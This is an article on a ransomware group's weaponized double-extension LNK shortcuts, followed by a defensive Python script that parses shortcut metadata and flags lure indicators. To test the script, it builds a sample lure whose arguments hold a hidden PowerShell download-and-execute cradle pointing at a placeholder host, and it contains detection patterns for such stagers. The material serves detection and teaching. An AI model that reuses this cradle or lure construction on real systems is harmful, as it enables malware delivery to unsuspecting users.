In a notable shift from conventional ransomware tactics, the Global Group has adopted a local execution strategy for its payloads, which presents significant challenges for network-centric security controls. Researchers observed that, unlike many modern ransomware operations that depend on external command-and-control (C2) infrastructure, the Global Group's payload runs entirely on the victim host once it has been delivered. With no C2 beaconing to spot, detections built around outbound traffic to known-bad infrastructure do not fire, which complicates both detection and response.
Weaponized LNK files
The infection process initiated by this group is particularly insidious. It begins when a user double-clicks a shortcut file carrying a double extension, such as "Document.doc.lnk". The trick relies on how Windows Explorer displays shortcuts: the .lnk extension is suppressed regardless of the "hide extensions for known file types" setting (the lnkfile type is registered with NeverShowExt), so the file is listed as "Document.doc" and appears to be a legitimate document even to users who have turned extension hiding off. To further diminish suspicion, the shortcut's icon is set to mimic that of a Microsoft Word file.
Upon execution, the .lnk file launches built-in Windows utilities, namely cmd.exe and PowerShell, which are then used to retrieve and execute the next-stage payload. This method is effective because it sidesteps controls that focus on identifying malicious documents or executable attachments: the lure is neither, and the binaries doing the work are signed Microsoft components. Defenders therefore need to inspect the shortcut itself (its target, arguments, window mode and icon location) and the explorer.exe to cmd.exe to powershell.exe process chain, rather than the file type the lure pretends to be.
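The following is an added example, not code from the original article or from any research cited by it, showing how a triage script can surface the indicators described above by reading the shortcut's own metadata instead of trusting its apparent file type. It parses just enough of the MS-SHLLINK format (the fixed header plus the StringData section that holds the target path, arguments and icon location) and then applies heuristics for a document-style double extension, a cmd.exe/PowerShell target, download or encoded-command arguments, a hidden console window, and an Office icon on a non-Office target. The two .lnk blobs it analyses are constructed in the script for the demonstration; the hostname `stage.invalid` and the file names are placeholders, not indicators from any real sample.

```python
import re
import struct

# Shell link CLSID 00021401-0000-0000-C000-000000000046 in on-disk (GUID) byte order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits from the ShellLinkHeader.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order, each present only if its flag is set.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))

SW_SHOWMINNOACTIVE = 7  # ShowCommand value that keeps the console window out of sight

DOUBLE_EXT_RE = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|rtf|txt)\.lnk$", re.I)
LOLBIN_RE = re.compile(r"\b(cmd|powershell|pwsh)\.exe\b|\bpowershell\b", re.I)
STAGER_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                       r"https?://|-enc(odedcommand)?\b|\s-e\s|frombase64string", re.I)
OFFICE_RE = re.compile(r"winword|excel|powerpnt|office", re.I)


def parse_lnk(data: bytes) -> dict:
    """Return header fields and StringData strings from raw .lnk bytes."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link: bad HeaderSize")
    if data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad LinkCLSID")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_command = struct.unpack_from("<I", data, 0x3C)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) followed by the IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    info = {"flags": flags, "show_command": show_command}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            info[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:   # assumption: a Western ANSI code page for non-Unicode shortcuts
            info[key] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return info


def triage(filename: str, data: bytes) -> list:
    """Return human-readable findings for a shortcut; an empty list means nothing suspicious."""
    info = parse_lnk(data)
    target = info.get("relative_path", "")
    args = info.get("arguments", "")
    icon = info.get("icon_location", "")
    findings = []
    if DOUBLE_EXT_RE.search(filename):
        findings.append("double extension: document-style name ending in .lnk")
    if LOLBIN_RE.search(target) or LOLBIN_RE.search(args):
        findings.append("target or arguments invoke cmd/PowerShell")
    if STAGER_RE.search(args):
        findings.append("arguments download or decode a next-stage payload")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window mode SW_SHOWMINNOACTIVE (hidden console)")
    if OFFICE_RE.search(icon) and not OFFICE_RE.search(target):
        findings.append("Office icon on a non-Office target")
    return findings


def build_sample_lnk(relative_path, arguments, icon_location, show_command) -> bytes:
    """Construct a minimal Unicode .lnk for the demo (constructed input, not a real sample)."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS
             | HAS_ICON_LOCATION | IS_UNICODE)
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    id_list = struct.pack("<H", 2) + b"\x00\x00"   # empty IDList: terminator only

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + id_list + s(relative_path) + s(arguments) + s(icon_location)


# Constructed lure: cmd.exe hidden window, PowerShell stager, Word icon.
LURE = build_sample_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    '/c powershell -nop -w hidden -c "IEX((New-Object Net.WebClient)'
    '.DownloadString(\'http://stage.invalid/s2.ps1\'))"',
    r"%ProgramFiles%\Microsoft Office\root\Office16\WINWORD.EXE", SW_SHOWMINNOACTIVE)
# Constructed benign shortcut: Word itself, no arguments, normal window.
BENIGN = build_sample_lnk(
    r"..\..\..\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "",
    r"%ProgramFiles%\Microsoft Office\root\Office16\WINWORD.EXE", 1)

if __name__ == "__main__":
    for name, blob in (("Document.doc.lnk", LURE), ("Word.lnk", BENIGN)):
        print(name, triage(name, blob) or ["no findings"])
```

The parser deliberately ignores the LinkTargetIDList and LinkInfo blocks beyond skipping them by size; a real shortcut usually carries the absolute target there as well, so a production tool should also decode those sections (or use a full library) and check for any target that does not match the icon. The heuristics are signals for triage, not verdicts: a hidden window or a PowerShell target each occur in legitimate admin shortcuts, and it is the combination with a document-style name and a mismatched Office icon that makes the lure pattern stand out.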